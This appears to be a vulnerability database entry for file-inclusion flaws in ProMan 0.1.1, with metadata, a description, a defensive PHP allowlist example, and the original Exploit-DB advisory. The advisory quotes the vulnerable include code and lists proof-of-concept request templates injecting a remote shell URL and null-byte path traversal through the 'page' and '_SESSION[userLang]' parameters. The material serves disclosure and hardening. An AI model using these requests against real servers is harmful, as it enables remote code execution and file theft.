Vendor: ProMan
By: cr4wl3r
CVSS: 8.8 (HIGH)
Vulnerability Type: Remote File Inclusion (RFI) and Local File Inclusion (LFI)
CWE: 98
Product Name: ProMan
Affected Version From: 0.1.1
Affected Version To: 0.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:pman:proman
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ProMan <= 0.1.1 Multiple File Include Vulnerability

ProMan is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'page' parameter of '_center.php' and 'userLang' parameter of 'elisttasks.php', 'managepmanagers.php', 'manageusers.php', 'helpfunc.php', 'managegroups.php', 'manageprocess.php', 'manageusersgroups.php' and other files. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Sanitize user-supplied input to prevent malicious code execution.
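
One way to apply this mitigation to the two include patterns quoted in the advisory below, as an added example that is not ProMan's own code. The function names, the allowlist contents and the default language 'en' are assumptions made for illustration; only 'info', 'page', 'userLang' and 'elisttasks.php' come from the advisory.

```php
<?php
// Added example, not ProMan code. Allowlist entries are assumed values.

// Pages _center.php may include ('info' is the default seen in the advisory).
const ALLOWED_PAGES = ['info', 'tasks', 'projects'];
// Language directories expected under lang/ (assumed).
const ALLOWED_LANGS = ['en', 'de', 'fr'];

// Return $value only when it is a string that exactly equals an allowlist
// entry; anything else (URLs, traversal, NUL bytes, arrays) yields $default.
function pick_allowed($value, array $allowed, string $default): string
{
    if (!is_string($value)) {
        return $default; // e.g. ?page[]=x arrives as an array
    }
    return in_array($value, $allowed, true) ? $value : $default;
}

// Hardened form of: include $_GET['page'].'.php';
function center_page_path(array $get): string
{
    $page = pick_allowed($get['page'] ?? null, ALLOWED_PAGES, 'info');
    return __DIR__ . '/' . $page . '.php';
}

// Hardened form of: include_once('lang/'.$_SESSION['userLang'].'/<file>');
function lang_file_path(array $session, string $file): string
{
    $lang = pick_allowed($session['userLang'] ?? null, ALLOWED_LANGS, 'en');
    return __DIR__ . '/lang/' . $lang . '/' . basename($file);
}

// Constructed inputs in the shape of the requests listed in the advisory.
$samples = [
    ['page' => 'tasks'],                    // legitimate page
    ['page' => 'http://example.invalid/x'], // remote URL, falls back to info
    ['page' => "../../etc/passwd\0"],       // traversal + NUL, falls back
    ['page' => ['a']],                      // array input, falls back
];
foreach ($samples as $get) {
    echo json_encode($get['page']), ' -> ', center_page_path($get), PHP_EOL;
}
echo lang_file_path(['userLang' => "../../tmp/x\0"], 'elisttasks.php'), PHP_EOL;
echo lang_file_path(['userLang' => 'de'], 'elisttasks.php'), PHP_EOL;
```

The query-string form `_SESSION[userLang]=` shown in the PoC only reaches `$_SESSION` when PHP's `register_globals` is enabled, so that setting should be off as well. The allowlist still rejects the value if it is not.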
Source

Exploit-DB raw data:

##############################################################
##ProMan  <= 0.1.1 Multiple File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/pman/files/
##############################################################
[RFI Code]

<?php
if (!($_GET['page']))
    include('info.php');
else
    include $_GET['page'].'.php';
?>

[LFI Code]

include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');
if (!defined('PROMAN'))
    pexit($l['no hack']);
##############################################################
PoC RFI:
 [phpRAINCHECK_path]/_center.php?page=[Shell]
##############################################################
PoC LFI:
 [phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00]

others...
##############################################################